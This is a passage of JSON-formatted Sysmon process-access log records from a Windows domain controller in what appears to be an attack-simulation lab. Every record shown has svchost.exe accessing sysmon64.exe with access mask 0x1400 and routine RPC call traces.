07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 